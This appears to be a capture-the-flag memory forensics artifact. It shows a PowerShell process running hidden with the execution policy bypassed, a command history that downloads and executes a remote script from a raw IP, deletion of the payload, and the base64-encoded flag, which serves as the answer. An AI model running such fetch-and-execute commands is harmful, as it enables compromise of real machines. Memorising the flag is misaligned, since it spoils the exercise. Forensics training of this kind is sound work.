POWERSHELL FORENSICS
===================
Process ID: 2847
Parent: explorer.exe (1484)
Command Line: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass

COMMAND HISTORY:
[14:28:12] IEX (New-Object Net.WebClient).DownloadString('http://185.243.115.42/payload.ps1')
[14:28:15] $data = 'Q1RGe21lbTByeV9mb3JlbnNpY3NfaDRja2VyX2YwdW5kfQ=='
[14:28:16] [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($data))
[14:28:18] Start-Process notepad.exe
[14:28:20] Add-Content -Path 'C:\Windows\Temp\log.txt' -Value $data
[14:28:25] Remove-Item 'C:\Windows\Temp\payload.ps1' -Force

MEMORY STRINGS:
- Base64 encoded flag stored in variable
- Downloaded malicious script from C2 server
- Created temporary log file with encoded data
- Attempted cleanup of downloaded payload

KEY FINDING:
Encoded flag found in PowerShell memory: Q1RGe21lbTByeV9mb3JlbnNpY3NfaDRja2VyX2YwdW5kfQ==